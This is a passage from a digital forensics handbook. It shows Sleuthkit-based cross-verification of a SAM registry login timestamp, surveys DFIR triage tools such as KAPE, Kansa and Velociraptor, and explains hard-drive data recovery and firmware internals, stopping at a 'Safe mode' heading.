Using the mmls command from the Sleuthkit, we can see that there is only one NTFS file system, at a sector offset of 2048 (under Start). We will be using additional file system and file extraction tools from TSK, and the sector offset is an important value: we use it to tell TSK which volume to access inside the image. Media storage partitioning can be quite complex, and with TSK we access each volume/file system separately.
Sample Scenario: Identify the File System

Our volume of interest has been identified at an offset of 2048 sectors inside the image. We pass this offset to the TSK tool fsstat to obtain detailed information on the file system:

$ fsstat -o 2048 image.raw
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: NTFS
Volume Serial Number: CAE0DFD2E0DFC2BD
OEM Name: NTFS
Volume Name: NTFS_2017d
Version: Windows XP

METADATA INFORMATION
--------------------------------------------
First Cluster of MFT: 42581
First Cluster of MFT Mirror: 2
Size of MFT Entries: 1024 bytes
Size of Index Records: 4096 bytes
Range: 0 - 293
Root Directory: 5

CONTENT INFORMATION
--------------------------------------------
Sector Size: 512
Cluster Size: 4096
Total Cluster Range: 0 - 127742
Total Sector Range: 0 - 1021950

$AttrDef Attribute Values:
$STANDARD_INFORMATION (16)   Size: 48-72      Flags: Resident
$ATTRIBUTE_LIST (32)         Size: No Limit   Flags: Non-resident
$FILE_NAME (48)              Size: 68-578     Flags: Resident,Index
$OBJECT_ID (64)              Size: 0-256      Flags: Resident
$SECURITY_DESCRIPTOR (80)    Size: No Limit   Flags: Non-resident
$VOLUME_NAME (96)            Size: 2-256      Flags: Resident
$VOLUME_INFORMATION (112)    Size: 12-12      Flags: Resident
$DATA (128)                  Size: No Limit   Flags:
$INDEX_ROOT (144)            Size: No Limit   Flags: Resident
$INDEX_ALLOCATION (160)      Size: No Limit   Flags: Non-resident
$BITMAP (176)                Size: No Limit   Flags: Non-resident
$REPARSE_POINT (192)         Size: 0-16384    Flags: Non-resident
$EA_INFORMATION (208)        Size: 8-8        Flags: Resident
$EA (224)                    Size: 0-65536    Flags:
$LOGGED_UTILITY_STREAM (256) Size: 0-65536    Flags: Non-resident

There is quite a bit of information in the fsstat output. The file system type, version, and volume name are all items we will want to record in our notes. Other information provided by fsstat can be useful for documenting and describing files carved from this particular volume, as well as the ranges of physical blocks used to store data.
Sample Scenario: Identify the File(s) of Interest

In this particular scenario, we are conducting a cross-verification of findings from a file we already know - the SAM registry file. In a normal Windows installation, the SAM is located in C:\Windows\System32\config. We can use the Sleuthkit fls tool to recursively list all the allocated files in the volume of interest and grep specifically for Windows/System32/config/SAM:

$ fls -Fr -o 2048 image.raw | grep -i system32/config/SAM
r/r 178-128-2:  Windows/System32/config/SAM

This output gives us the NTFS file system's Master File Table (MFT) entry for the SAM file. In this case, the MFT entry is 178-128-2.
Sample Scenario: Extract the Data

We will do two quick steps here. First, we extract the file using the Sleuthkit's icat command, which takes the metadata entry (in this case MFT entry 178) and streams the contents of the data blocks or clusters to our chosen destination (in this case, an extracted file):

$ icat -o 2048 image.raw 178 > image.SAM
$ file image.SAM
image.SAM: MS Windows registry file, NT/2000 or above

The icat command extracts the SAM file and writes it to a file called image.SAM (arbitrarily named). Once this is done, we use the Linux file command to make sure that the file type we've extracted matches what we expect. In this case, we expected a Windows registry file, and that's exactly what we have.

At this point, we can install libregf. This allows us to gather some simple identifying information as well as mount the registry file so we can parse it for the information we are seeking. The following commands are provided by the libregf package:

$ regfinfo image.SAM
regfinfo 20220131

Windows NT Registry File information:
        Version:   1.3
        File type: Registry

$ mkdir regfmnt
$ regfmount image.SAM regfmnt/
regfmount 20220131

Using the commands provided by libregf, we confirm the identity and version of the registry file. Then we create a mount point - a directory to which we can attach the registry file so we can browse its contents.
Sample Scenario: Parse the Artifact

Given that we've already examined this file in our main forensic suite, and we are simply cross-verifying our results here, we would already know the account's Relative ID (RID) - in this case, the account's RID is 1000. Knowing the RID (from our previous examination - this is a cross verification), we can browse to the account's associated keys in the mounted registry file:

$ cd regfmnt/SAM/Domains/Account/Users/
$ ls
(values)/  000001F4/  000001F5/  000003E8/  000003E9/  Names/

The directory SAM/Domains/Account/Users/ contains keys for each account, listed by RID in hexadecimal. If you study Windows forensics, you know that there is a System Administrator account (RID 500), a Guest account (RID 501), and user accounts starting at RID 1000 by default. We can confirm that the account we are interested in is 000003E8 by converting the value to decimal using shell arithmetic expansion and finding 1000:

$ echo $((0x3E8))
1000

Changing into that directory, we find several subkey values. Again, studying registry forensics, we find that the F value contains an account's login information, so we change our directory to (values) for that account:

$ cd "000003E8/(values)"
$ ls
F  UserPasswordHint  V

There are three values listed, including F.
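To convert all of the listed RID keys at once, a small shell loop will do (a sketch; bash arithmetic accepts a 16# radix prefix for hexadecimal values):

$ for k in 000001F4 000001F5 000003E8 000003E9; do echo "$k -> $((16#$k))"; done
000001F4 -> 500
000001F5 -> 501
000003E8 -> 1000
000003E9 -> 1001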
Sample Scenario: Cross Verify the Findings

Using a hex viewer included with Linux (xxd), we can look at the subkey's value. The Last Login Date is stored at hex offset 8:

$ xxd F
00000000: 0200 0100 0000 0000 678E 5DF7 F7C1 D201  ........g.].....
00000010: 0000 0000 0000 0000 20D7 BF15 76AE D201  ........ ...v...
00000020: FFFF FFFF FFFF FF7F 5CE9 5DF2 F7C1 D201  ........\.].....
00000030: E803 0000 0102 0000 1402 0000 0000 0000  ................
00000040: 0000 0700 0100 0000 0000 4876 488A 3600  ..........HvH.6.

Hex offset 8 in the above output is on the first line: 678E 5DF7 F7C1 D201. There are a number of tools available to convert that hex string to a date value. We will use a simple Python script (WinTime.py²³⁹):

$ python ~/WinTime.py 678e5df7f7c1d201
Sun Apr 30 21:23:09 2017

Here again is the original output from the analysis we are trying to verify (with some output removed for brevity):

...
Last Login Date : Sun Apr 30 21:23:09 2017 Z
...

So we can see that our original analysis, using a common digital forensics tool under Windows, has been cross-verified with a completely separate set of tools under a different operating system. A far more detailed look at this level of analysis is covered in the aforementioned LinuxLEO guide. Note that we included the acquisition here for completeness; in a real cross-verification situation, the image already acquired is fine to use, as it has generally already been verified by hashing.

We've actually accomplished a bit more by verifying our results with Linux. In addition to proving the veracity of what our original tool found, we have focused on a "smoking gun" artifact and manually extracted and parsed it ourselves. This entire manual process will go in your notes, along with any research you needed to do in order to complete it (Which registry file do I need? Where is the login data stored? What offset? What format?). Should you ever be called to testify or participate in any adjudication process, you will be better prepared to answer the opposition's questions on how your original tool found what it reported.

²³⁹https://linuxleo.com/Files/WinTime
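As an aside, if a helper script like WinTime.py is not at hand, the conversion can be reproduced in a few lines of Python. A Windows FILETIME value is a little-endian count of 100-nanosecond intervals since 1601-01-01 UTC, so a minimal sketch looks like this:

$ python3 -c "
import struct, datetime
ft = struct.unpack('<Q', bytes.fromhex('678e5df7f7c1d201'))[0]  # little-endian FILETIME
print(datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=ft // 10))
"
2017-04-30 21:23:09.835223

The sub-second remainder also shows that the raw timestamp is more precise than the whole-second value the reporting tool displays.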
This same approach applies to the results of a mobile device analysis. In many mobile device analysis suites, chats are displayed in a GUI tool and organized by conversation. Find something important to the investigation? Fire up a Linux command line and dig into the database yourself. In many cases, you don't even need to leave your Windows forensic workstation desktop: you can use WSL/WSL2, or SSH into your physical Linux workstation or VM using PuTTY²⁴⁰.

²⁴⁰https://putty.org
Closing

While doing all this on the command line looks daunting, it is an excellent way to drill down to the "bits and bytes" and learn digital forensics from the ground up. There is no doubt that a full GUI suite of digital forensic tools can be a more efficient way of drilling into large amounts of data quickly. Where the Linux command line excels is in forcing you to learn exactly where you need to look for specific data and how it is stored. With a growing number of ways to access a Linux environment without the need for excessive resources, Linux and its powerful tools are increasingly accessible to forensic examiners and modern digital forensic laboratories.
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage

By Guus Beckers²⁴¹ | LinkedIn²⁴²

What is triage?

While full disk analysis certainly has its place, triage is an essential part of digital forensics. The purpose of triage is twofold: to cut down on the noise generated by the multitude of events on a host, and to determine whether deep-dive forensics is required. As time and computing power are precious resources, it is best not to waste them. Luckily, there are a couple of concepts and tools that can help an investigator out at any level of the investigation.

What should be included in a triage?

Before getting into the nitty gritty of tools, let's examine what is useful to include within a triage for the majority of cases. If specific cases involve other well-known artifacts, do not hesitate to add them to your list of triage items. It is advisable to collect multiple types of evidence sources to get a thorough understanding of the case at hand; sometimes evidence will not be available within all data structures due to the specific behavior of the operating system, while at other times an adversary might have deleted one of the available sources. Without further ado, let's take a look at the list:

²⁴¹http://discordapp.com/users/323054846431199232
²⁴²https://www.linkedin.com/in/guusbeckers/
• A series of artifacts that keep track of the locations of files on the disk or in a file manager, and of any performed actions (renaming/deleting); this can be a $MFT or a list of locations that have been accessed.
• Artifacts that track the history of files contained within a folder.
• Any hibernation or swap files that have been written to disk; these particular artifacts can extend your window into the past by days or even weeks.
• Artifacts that indicate account usage, modification, or deletion.
• Artifacts that can clarify which applications were installed or uninstalled on a particular date.
• Artifacts that can be used to prove application execution in the past.
• Artifacts that can track network activity or data transfer by a particular process.
• Any available web browser history and records of auxiliary actions such as initiated downloads.
• Artifacts that track external events, such as plugging in USB drives and/or other devices.
• Any available event logs maintained by the operating system or relevant applications.
• Records of admin-level activities on a system.

These artifacts can be used for initial analysis while further processing of a case takes place.

Forensic triage of one or a limited number of hosts

Historically, to examine a computer, an investigator would manually collect all artifacts and go through them one by one: know the artifact, go to the folder containing the artifact, export it, and repeat the process for every relevant artifact. To say this requires a significant time investment is an understatement.

A few years ago, KAPE was introduced to the forensic community. It is a standalone executable that contains a wealth of forensic knowledge about where artifacts live on a computer (knowledge you can extend by collaborating on the public GitHub repository). KAPE contains a set of definitions called Targets. A Target defines where an artifact lives on a system, and collecting it is as easy as ticking a checkbox. Targets can also contain other Targets. In this manner, KAPE offers various triage Targets, thereby allowing an investigator to triage an entire host just by selecting a single Target. Target collection can also be automated on endpoints by utilizing KAPE's command line counterpart.

The second part of KAPE covers analysis through definitions called Modules. A Module can comb through data collected by a Target and transform it into a file format that is easy to ingest in other tools. It does this by interacting with third-party tools that are part of a Module; any executable with a command line interface is a viable option. As an example, KAPE comes with the entire suite of forensic parsers by Eric Zimmerman (for the full list, check here²⁴³), which cover the most popular Windows forensic artifacts.

²⁴³https://ericzimmerman.github.io/
Of particular note for triage is the KapeTriage Target²⁴⁴. The following description is provided at the time of writing:

"KapeTriage collections will collect most of the files needed for a DFIR Investigation. This Target pulls evidence from File System files, Registry Hives, Event Logs, Scheduled Tasks, Evidence of Execution, SRUM data, SUM data, Web Browser data (IE/Edge, Chrome, Firefox, etc), LNK Files, Jump Lists, 3rd party remote access software logs, antivirus logs, Windows 10 Timeline database, and $I Recycle Bin data files."

The KapeTriage collection can be post-processed using the !EZParser Module²⁴⁵. These parsers, also written by Eric Zimmerman, can be used to extract information from the most common artifacts; the data is made available in CSV format. The parsers (and other tools) can also be downloaded individually here²⁴⁶. Among the tools is Timeline Explorer, a utility that can open CSV files and has robust search and sorting options. A description and demonstration of Timeline Explorer is available at AboutDFIR²⁴⁷.

KAPE can be used during live investigations, but also after a forensic image has been created. A recommended tool to use with KAPE is Arsenal Image Mounter, whose capabilities include read-only and write-protected image mounting. Just point KAPE at the assigned drive letter and it can perform collection and analysis.

Utilizing KAPE, the collection and transformation of artifacts is brought down to a matter of minutes. This allows an investigator to perform triage to determine whether a deep-dive is required, or to triage while other forensic evidence is still processing. A sketch of such a run follows below.

²⁴⁴https://github.com/EricZimmerman/KapeFiles/blob/master/Targets/Compound/KapeTriage.tkape
²⁴⁵https://github.com/EricZimmerman/KapeFiles/blob/master/Modules/Compound/!EZParser.mkape
²⁴⁶https://ericzimmerman.github.io/#!index.md
²⁴⁷https://aboutdfir.com/toolsandartifacts/windows/timeline-explorer/
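As an illustration of what such an automated run could look like on the command line - a sketch only, with illustrative drive letters and destination paths; verify the flags against the KAPE documentation for your version:

kape.exe --tsource C: --tdest D:\Triage\tout --target KapeTriage --msource D:\Triage\tout --mdest D:\Triage\mout --module !EZParser

This would collect the KapeTriage Target from the live C: drive, then run the !EZParser Module over the collected files, leaving CSV output in the module destination folder.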
Another possibility when dealing with a single host is creating a custom content image using FTK Imager, which allows you to manually select the artifacts you want to collect using a graphical interface. Richard Davis covers this extensively in a video of his 13Cubed digital forensics YouTube series; it can be found here²⁴⁸.

macOS and Linux

Tools similar to KAPE also exist for other operating systems. One tool that deals exclusively with macOS (and its mobile counterparts iOS and iPadOS) is mac_apt²⁴⁹. It can extract a wealth of information from a macOS system and can deal with a variety of images and acquired data. mac_apt is used exclusively on forensic images. Fortunately, there is a live response counterpart: the Unix-like Artifacts Collector²⁵⁰ (UAC for short) can acquire data from both macOS and a range of Linux distributions. Both tools are open source and any contribution is welcomed.

Scaling up to a medium-sized subnet

The aforementioned tools work fantastically on a single host, but how can we scale this to a subnet? The Kansa PowerShell IR framework was created by Dave Hull to meet a growing need in the DFIR community: determining where deep-dive forensics should take place in ever-expanding networks. To do this, Kansa operates on two assumptions: malware needs to be present on a machine to perform its actions, and malicious activity is relatively rare and therefore automatically stands out.

To accomplish this, Kansa is made up of two distinct components. The collection component is able to collect a number of lightweight artifacts, including autostart locations, services, new admin users, etc. Each type of artifact is collected by its own PowerShell script, and these scripts are tied together by a Kansa master script, which sets which evidence needs to be collected. The Kansa scripts need to be executed on each server where evidence is to be collected; to facilitate a secure transfer of credentials, Kansa uses PowerShell remoting. Kansa also integrates with third-party executables: any required executable can automatically be pushed to the various servers.

The second component is analysis with Kansa. The analysis scripts stack the output of each gathered evidence item and count the occurrences of each item. In this manner, outliers become more easily visible.

A limitation of Kansa is that it uses persistent PowerShell connections until a script has completed. For this reason, it is not recommended to use Kansa on more than 100 hosts. A distributed version of Kansa, developed by Jon Ketchum, addresses this limitation: persistent connections are no longer required, and because larger data sets require an optimized parsing method, the distributed version uses an Elasticsearch backend. You're encouraged to check out the original talk²⁵¹.

macOS and Linux don't have similar tools, but this shouldn't necessarily be a problem. Both operating systems have a long history of text manipulation tools like awk, grep, and uniq. Depending on the retrieved information, a combination of these tools can be used to achieve the same results, as sketched below.

²⁴⁸https://www.youtube.com/watch?v=43D18t7l7BI
²⁴⁹https://github.com/ydkhatri/mac_apt
²⁵⁰https://github.com/tclahr/uac
²⁵¹https://www.youtube.com/watch?v=ZyTbqpc7H-M
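As a sketch of that stacking approach, assume each host's autorun entries were exported to a CSV file named autoruns_<host>.csv (an illustrative naming scheme):

$ cat autoruns_*.csv | sort | uniq -c | sort -n | head -20

uniq -c counts identical lines across all hosts, and the ascending numeric sort floats the rarest entries - the potential outliers - to the top of the output.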
Scaling up to an entire network

Individual hosts and small networks have been discussed; what are the options when you deal with a massive network? A single tool can be used in that instance. Velociraptor is another addition to the open source DFIR arsenal. Upon its arrival in 2018 it quickly gathered a following, and it isn't difficult to see why: Velociraptor is one of the most powerful tools in the DFIR community. For starters, it supports all the major operating systems - Windows, macOS, and Linux alike. What makes Velociraptor stand out is its distributed computing model along with a client/server approach.

A Velociraptor instance consists of a server and a number of clients distributed throughout a (client) network. The agent creates a persistent connection to the server. Analysts can use Velociraptor to:

• Retrieve any file on a connected endpoint in a forensically sound manner
• Retrieve forensic artifacts from all connected endpoints with the push of a button
• Scan for IOCs utilizing both regex and YARA rules
• Push and utilize third-party command line tools on all hosts running an agent

It is not possible to do Velociraptor justice within a short section of this chapter. Rather than describe it further, it is advised to see the tool in action. Eric Capuano recently gave a rundown²⁵² of Velociraptor using a small network. Furthermore, Michael Cohen developed his own tutorial series, which is currently available free of charge at this link²⁵³.

Other tools

A number of other triage tools aren't discussed in depth here but are still quite useful when performing triage. They can either be used on a standalone basis or pushed by Velociraptor. Be aware that these tools might set off AV due to their included malware signatures.

• Autoruns²⁵⁴, or its CLI version Autorunsc, useful for enumerating all ASEP locations on a host
• DeepBlueCLI²⁵⁵, a tool which enables threat hunting using the Windows event logs
• Chainsaw²⁵⁶, a similar tool which can group significant events
• Loki²⁵⁷, an IOC/YARA scanner which can enumerate known malicious files on a host
• Hayabusa²⁵⁸, an expansive threat hunting scanner which offers timelining capabilities

Practicing triage

Triage can be practiced on any number of forensic disk images. The following community images are included as recommendations:

• DFIR Madness - The case of the stolen Szechuan sauce²⁵⁹
• Digital Corpora - 2012 National Gallery DC Scenario²⁶⁰
• Digital Corpora - 2019 Narcos Scenario²⁶¹
• Cyberdefenders - Pawned DC²⁶²

²⁵²https://www.youtube.com/watch?v=Q1IoGX--814
²⁵³https://docs.velociraptor.app/training/
²⁵⁴https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
²⁵⁵https://github.com/sans-blue-team/DeepBlueCLI
²⁵⁶https://github.com/WithSecureLabs/chainsaw
²⁵⁷https://github.com/Neo23x0/Loki
²⁵⁸https://github.com/Yamato-Security/hayabusa
²⁵⁹https://dfirmadness.com/the-stolen-szechuan-sauce/
²⁶⁰https://digitalcorpora.org/corpora/scenarios/national-gallery-dc-2012-attack/
²⁶¹https://digitalcorpora.org/corpora/scenarios/2019-narcos/
²⁶²https://cyberdefenders.org/blueteam-ctf-challenges/89
Contributions and sources

Forensic triage, perhaps more than any other aspect of forensics, relies on the input of the entire community. Without the aid of the developers in this section, triage would surely be more difficult.

• Eric Zimmerman for creating the variety of parsers and KAPE.
• Andrew Rathbun for creating a multitude of KAPE Targets.
• Yogesh Khatri for creating the mac_apt acquisition framework.
• Thiago Lahr for his development of the Unix-like Artifacts Collector.
• Dave Hull for creating Kansa, and Jon Ketchum for extending the original suite with DistributedKansa.
• Michael Cohen for creating Velociraptor.
• Eric Conrad for his work on DeepBlueCLI.
• Nextron Systems for developing the Loki scanner.
• WithSecure Labs for developing the Chainsaw EVTX scanner.
• Yamato Security for creating the Hayabusa threat hunting scanner.

Information from the sources below was also used in creating this chapter:

• Richard Davis for creating the excellent 13Cubed YouTube series.
• Eric Capuano for demoing the powerful capabilities of Velociraptor.
Chapter 12 - Data recovery

By Mark B.²⁶³ | Website²⁶⁴ | Instagram²⁶⁵

Types of data recovery

When talking about data recovery, it is important to distinguish between:

• Logical data recovery
• Physical data recovery

Both topics will be covered in this chapter.

²⁶³https://opensource-data-recovery-tools.com/
²⁶⁴https://data-recovery-prague.com/
²⁶⁵https://www.instagram.com/disk.doctor.prague/
Logical data recovery

This is the type of data recovery offered by most forensic tools and a lot of specialized programs. A logical data recovery can mean:

• restoring deleted files,
• dealing with a damaged filesystem catalogue, or
• repairing damaged files.

As good as forensic tools are for conducting an investigation, most of them fall very short when handling corrupted filesystems. On the other hand, there are really great logical recovery tools, including but not limited to:

• R-Studio²⁶⁶
• UFS Explorer²⁶⁷
• DMDE²⁶⁸

These tools are able to handle even the most severely damaged filesystems very well. The problem for forensics is the way such tools work. So-called data recovery programs analyse the whole drive and try to "puzzle" a filesystem together based on the data that was found. That means that such a generated virtual filesystem is the tool's interpretation of the data. It would be very hard, and in some cases even impossible, to fully understand how the program arrived at the final result. As great as these tools are for recovering data and building a working folder tree from corrupted filesystems, they may not be ideal for forensics because the processes that lead to the results are not always clear.

²⁶⁶https://r-studio.com
²⁶⁷https://www.ufsexplorer.com
²⁶⁸https://dmde.com
Physical data recovery

This category contains all kinds of cases - for example:

• unstable drives,
• damaged PCBs (printed circuit boards),
• firmware issues,
• heads stuck on the platters,
• broken motors,
• broken read/write heads, and even
• damaged or dirty platters.

In the case of flash memory like memory cards, pendrives, or SSDs, there are just:

• electronic problems and
• firmware issues,

which make up the majority of the cases.

So, first of all you need to come to a conclusion as to how far it makes sense to go with data recovery when conducting a forensic investigation. I have thought about that for quite some time, and I think most forensic investigators will not want to build a fully-fledged data recovery operation, start doing cleanroom data recovery, or dive very deep into firmware repair. Generally speaking, though, most forensic investigators probably don't want to outsource the imaging of a drive to a data recovery lab just because Windows drops the drive after it becomes unstable. I guess many will also want to handle a PCB swap without a data recovery lab. That is for sure an individual decision, but going deeper into data recovery would need much more information than I could fit into one chapter. If you are interested in a detailed introduction to professional data recovery, I would recommend my book Getting started with professional data recovery²⁶⁹ (ISBN 979-8800488753).

With the above-mentioned use cases in mind, we can have a look at the right tools to fit that need. These are my preferences:

• Guardonix²⁷⁰
• RapidSpar²⁷¹
• DeepSpar Disk Imager²⁷²

²⁶⁹https://www.amazon.com/dp/B09XBHFNXZ/
²⁷⁰https://guardonix.com/
²⁷¹https://rapidspar.com/
²⁷²https://www.deepspar.com/products-ds-disk-imager.html
The Guardonix is a quite powerful write blocker which allows you to handle unstable drives by maintaining two independent connections - one to the PC, which is kept up even when the drive is hanging or unresponsive, and one to the drive itself. In this way, the operating system is not aware of any issues the drive may have. With the professional edition of the tool, the operator may even set a timeout to skip bad areas on the first pass.

The RapidSpar is a highly automated solution for easier data recovery cases. It allows only a basic level of control, but it can handle even some firmware cases automatically. The tool is mainly designed for PC repair shops offering semi-professional data recovery services; with the data acquisition add-on it would become a quite interesting tool for a forensics lab. It's just a pity that the tool lacks even the most basic forensic functions! It is good to have those firmware capabilities, but RapidSpar does not document anything it does, so it is an absolute no-go for forensics. For entry-level data recovery operations this tool is a good choice, but you may reach its limits quite fast because the tool supports essentially no manual control.

The DeepSpar Disk Imager, DDI for short, is a PCIe card which can handle the cloning of highly unstable drives. It is the most professional data recovery tool of the three, but it is strictly limited to imaging. It is also ready for forensic imaging and can calculate checksums on the fly. The DDI is known in the data recovery industry for its great handling of unstable drives. The way a DDI reports errors is also great for diagnosis as the imaging progresses - errors are shown in the sector map as red letters. For example, an I means "sector ID not found", and if you get reading errors with the letter I only after a certain LBA, the drive most probably has a translator issue (see firmware/error register).

The DeepSpar Disk Imager and RapidSpar have another advantage over the Guardonix/USB Stabilizer: these tools can build a head map and ignore all sectors which belong to a defective head. This also allows you to identify bad heads and image the good heads first, which is safer.
How to approach a data recovery case

Before thinking about a data recovery attempt, you have to understand what the cause of the issue is and how to deal with it. This is very important because a wrong approach can damage drives. That's why the first step is always the diagnosis! To properly diagnose an HDD, you need to understand the start-up procedure, the firmware, and the sounds a drive makes with certain issues.

HDD start-up process

Put simply, you can divide the boot process of the HDD into the following steps:

1. The data from the ROM chip is loaded and the motor is started.
2. If the motor rotates fast enough for an air cushion to form, the read/write head is moved from its parking position (near the spindle, or on a ramp outside the platters) onto the platters.
3. The first part of the firmware, loaded from ROM, contains the instructions on how the disk can load the remaining part of the firmware from the platters. This part is located in an area of the platters - the so-called service area - which is not accessible by the user.
4. If the firmware could be fully loaded, the disk reports that it is ready for use.

Knowing about this boot process can help us a lot in diagnosing problems. If a disk spins up, it most likely means that the ROM, MCU, RAM, and motor control are OK, and PCB damage can be ruled out with a high degree of probability.

HDD firmware

A hard drive isn't just a dumb peripheral device; it's a small computer with a processor, memory, and firmware that's quite similar to an operating system. By now, only three manufacturers, who bought up many other competitors along the way, have prevailed in the market. Therefore, despite all the differences between the manufacturers, the firmware of hard drives follows a similar structure. The firmware is divided into different modules, which represent either data (G-List, P-List, S.M.A.R.T. data, ...) or executable code. In general, the individual modules can be divided into the following categories:

1. The servo subsystem, which can be compared to the drivers on a PC. On the HDD it is responsible, for example, for controlling and operating the head and the motor. The Servo Adaptive Parameters (SAP) exist to correctly address these parts of the HDD. Damage in these modules can result in the motor not running or the head making clicking noises.
2. The read/write subsystem, which provides the addressing (CHS, LBA, PBA, ...). This category includes the Zone Table, G-List, P-List, ...
3. The firmware core, which is responsible for ensuring that all modules and components work together and can therefore best be compared to an operating system kernel.
4. The additional programs, which are very individual and depend on the model family and manufacturer, just like user software on a PC. These include, for example, self-test and low-level formatting programs.
5. The interface, which is responsible for communication via the SATA/PATA port and, in some cases, also for communication via the serial port that some hard drives provide.

The higher layers build on the layers below. Therefore, the nature of a problem can already indicate at which level or levels you have to look.

A small part of the firmware is present on the ROM chip or directly in the MCU (Micro Controller Unit). This part can be imagined as a mixture of BIOS and boot loader: it runs a self-test and then uses the head of the drive to load the rest of the firmware from the platters. We find the remaining parts of the firmware in the so-called service area (SA) on the platters. This is a special area on the platters that is not accessible to a normal user. Usually there are at least two copies, which can be read via head 0 and head 1.

To access the service area you need special software like WD Marvel and Sediv, or special hardware tools like PC-3000, MRT, DFL SRP, or DFL URE (though URE is quite limited here). These are not tools that can be learned by trial and error. Any incorrect use of the various options can damage the hard drive: if you try to repair a healthy module, there is a high chance that it will be damaged afterwards, and if it is a critical module, the HDD will not start anymore. Also, the options offered vary depending on the vendor and model of the hard drive, so you can only perform certain actions on certain models.

The learning curve of these tools is extremely steep, and a lot depends on the tool used. Mastering a firmware tool takes a lot of practice and experience, which you build up over years of working with other DR technicians, attending training courses and conferences, and working with support on specific cases. So this area of data recovery requires the greatest learning effort and the purchase of the most expensive tools, yet it represents only a very small part of the cases. Therefore, there are quite a few laboratories that handle only some of these firmware problems themselves and outsource the harder cases. MRT, for example, offers to have their technicians solve firmware problems via remote sessions and charges $50 USD in case of a successful data recovery. DFL offers its customers up to 5 support requests per month for free, as does Ace Labs.

The possible causes of firmware problems are just as varied as the solutions:

• The G-List or S.M.A.R.T. logs fill up or run into other modules (similar to a buffer overflow in RAM) and partially overwrite them.
• The data of a module was written incompletely or is damaged due to other errors (e.g. a failed sector).
• The data in the ROM chip does not match the data in the service area.
• The ROM chip is mechanically damaged or short-circuited.
• etc.
If you think about the start-up process of the HDD, then from the perspective of the firmware the ROM chip is read first, then the servo subsystem, then the read/write subsystem, and then everything else is loaded to provide access to the user data. If this process does not complete, it is not uncommon to have read and write access to the service area but not to the user data.

Most of the commands that allow access to the firmware are manufacturer-specific and unfortunately not documented - at least not publicly! There are some data recovery laboratories that have access to confidential company-internal documents from the manufacturers, documenting various firmware versions, manufacturer-specific ATA commands, and the like, and that sometimes pass them on to others on the sly. In many areas, leaked information like this, or reverse engineering, is the only source of information. Some basic information can be found online as well as in firmware tool manuals. Anyone who starts looking into this will have to invest some time here and read up accordingly whenever new information is encountered.

Important parts of the firmware

As you already know, the service area is divided into modules, of which certain modules are essential for the operation of the disk while others are not necessary. If a disk cannot read data from copy 0, it will usually try to read from copy 1. It can therefore take a while before an HDD reports that it is ready: the firmware often makes several read attempts before switching to the next copy, and the more modules are damaged, the longer this can take. I've seen hard drives which needed several minutes to become ready.

Some modules are unique to each disk, and other modules are the same for all disks with a specific firmware version, or even for all disks of an entire model range. Damaged modules that are not individual to each hard disk can often be loaded from donor disks or obtained from the Internet and then used to repair a customer's disk.

Within the firmware sectors there is another type of addressing - the so-called UBA addressing (Utility Block Address). Sometimes it is also called the Universal Block Address; that's because the manufacturers of data recovery tools don't have access to the firmware developers' documentation, find out most of it by reverse engineering, and then simply name things themselves. That is why the individual terms also differ between the individual firmware tools (PC-3000, MRT, DFL).

The following parts can be found in one way or another in every HDD firmware, and it is very important to understand them in order to recover data from an HDD.

P-List

This list includes sectors that were defective at production time, which is why it is called the primary, permanent, or production-time defects list.
So that the hard disk is not forced to execute head jumps right from the start due to mapped-out sectors, the sectors that were already defective at production time are simply skipped, and the LBA numbering is structured in such a way that it runs consecutively from sector 0 to N with the defects in between skipped:

12.1 - P-list

This also shows how PBA (physical block addressing) differs from LBA (logical block addressing). The P-List is one of the modules that is unique to each hard drive and cannot be replaced.

G-List

The growing defects list, or G-List, is a list of sectors that fail during operation. To avoid having to move several TB of data by one sector in the worst case, a defective sector is replaced with the next free reserve sector during operation:

12.2 - G-list

If a read or write error occurs, the sector is marked as defective and mapped out at the next opportunity when the disk is idle. This happens in so-called background processes, which in most cases start after 20 seconds of idle time. That's why professional data recovery labs disable unnecessary background activities, in order not to corrupt data and to save the disk unnecessary work. If you do not have that option, you need to pay attention to the drive and not let it run when it is not in use.

If the G-List is lost, data will be damaged because sectors mapped out during operation are reset to their old locations. However, this can also be used in a forensic investigation to recover old data fragments in the sectors which got mapped out, even after the disk has been wiped.

This also means that a hard disk becomes slower and slower the more mapped-out sectors there are, because the head has to jump to the new location of an LBA more and more often when reading data. Depending on the manufacturer/model series, this differs slightly; many disks have smaller reserve areas distributed over the platters to minimize the necessary jumps and the associated loss of performance.
Translator

The translator is the module that converts an LBA address into the corresponding arm movement. If the translator is defective, you have no access to the data. It is relatively easy to test whether the translator has a problem.

Zone tables

Zones make it possible to use a different number of sectors per track. The old CHS (Cylinder, Head, Sector) addressing assumed that each track or cylinder had the same number of sectors. Since the radius of the cylinders decreases with each step towards the spindle, a lot of space would be wasted if the outer cylinders had the same number of sectors as the inner cylinders. Here is a simplified graphical representation for comparison:

12.2 - HDD with and without zone tables

What is displayed graphically here is stored by the zone table in a form that can be used by the firmware. Without this data, it would not be possible to calculate where a specific LBA address is located on the platters!

Servo parameters / Servo Adaptive Parameters

This data is used to fine-tune the head and is unique to each hard drive. Incorrect data can lead to the head no longer reading, or reading only with reduced performance. There are often different data sets for the service and user areas.

Security-relevant data / passwords

Some encryption methods save the passwords in the service area of the hard disk. In these cases, passwords can easily be read out or removed with access to the firmware modules.
Firmware/overlay code

To put it simply, these are program instructions that are loaded into the main memory of the HDD when required. As with very old computers, the working memory of hard disks is very limited, and developers therefore have to be careful with it. Depending on the context in which these terms are used, this is either code that is loaded on demand, like a DLL, or code that is loaded from the service area and overwrites the first rudimentary program parts loaded from ROM. In any case, the term is most common for special code parts that are loaded into the RAM of the HDD when needed and then replaced with other code parts when the function is no longer needed.

S.M.A.R.T. data

S.M.A.R.T. was developed to warn the user before a hard drive fails. Often, however, S.M.A.R.T. is itself the cause of such a failure: the S.M.A.R.T. log becomes corrupted and contains invalid data that the disk cannot process, causing the disk to fail to boot fully and never report that it is ready. Since S.M.A.R.T. is not essential for operation, deleting the S.M.A.R.T. data and disabling the S.M.A.R.T. functions is the simplest solution to this problem.

Serial number, model number and capacity

In many cases, the serial and model numbers are read from the service area. If a hard drive shows the correct model and serial number, as well as capacity and firmware version, this is a very strong indicator that the head can at least read the service area. If there is no access to the user data but the above-mentioned values are displayed correctly (data recovery technicians call that a "full ID"), you can determine with a high degree of certainty that at least one head is OK and can read.

Safe mode

